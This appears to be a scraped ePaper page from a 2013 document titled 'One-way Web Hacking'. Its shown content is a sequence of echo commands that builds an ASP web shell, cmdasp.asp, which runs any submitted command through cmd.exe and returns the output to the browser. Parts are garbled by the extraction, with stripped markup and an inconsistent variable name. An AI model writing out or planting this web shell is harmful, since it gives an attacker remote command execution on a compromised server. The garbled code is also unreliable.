12.07.2013 Views

One-way Web Hacking

One-way Web Hacking

One-way Web Hacking

SHOW MORE
SHOW LESS

Create successful ePaper yourself

Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.

echo Set oScript = Server.CreateObject(^"WSCRIPT.SHELL^") >> cmdasp.asp<br />

echo Set oScriptNet = Server.CreateObject(^"WSCRIPT.NETWORK^") >> cmdasp.asp<br />

echo Set oFileSys = Server.CreateObject(^"Scripting.FileSystemObject^")<br />

>> cmdasp.asp<br />

echo szCMD = Request.Form(^".CMD^") >> cmdasp.asp<br />

echo If (szCMD ^ ^"^") Then >> cmdasp.asp<br />

echo szTempFile = ^"C:\^" & oFileSys.GetTempName() >> cmdasp.asp<br />

echo Call oScript.Run(^"cmd.exe /c ^" ^& szCMD ^& ^" ^> ^" ^& szTempFile,0,True)<br />

>> cmdasp.asp<br />

echo Set oFle = oFileSys.OpenTextFile(szTempFile,1,False,0) >> cmdasp.asp<br />

echo End If >> cmdasp.asp<br />

echo ^%^> >> cmdasp.asp<br />

echo ^<br />

>> cmdasp.asp<br />

echo ^ >><br />

cmdasp.asp<br />

echo ^ >> cmdasp.asp<br />

echo ^ >> cmdasp.asp<br />

echo ^ >> cmdasp.asp<br />

echo ^> cmdasp.asp<br />

echo If (IsObject(oFile)) Then >> cmdasp.asp<br />

echo On Error Resume Next >> cmdasp.asp<br />

echo Response.Write Server.HTMLEncode(oFile.ReadAll) >> cmdasp.asp<br />

echo oFile.Close >> cmdasp.asp<br />

echo Call oFileSys.DeleteFile(szTempFile, True) >> cmdasp.asp<br />

echo End If >> cmdasp.asp<br />

echo ^%^> >> cmdasp.asp<br />

echo ^ >> cmdasp.asp

Hooray! Your file is uploaded and ready to be published.

Saved successfully!

Ooh no, something went wrong!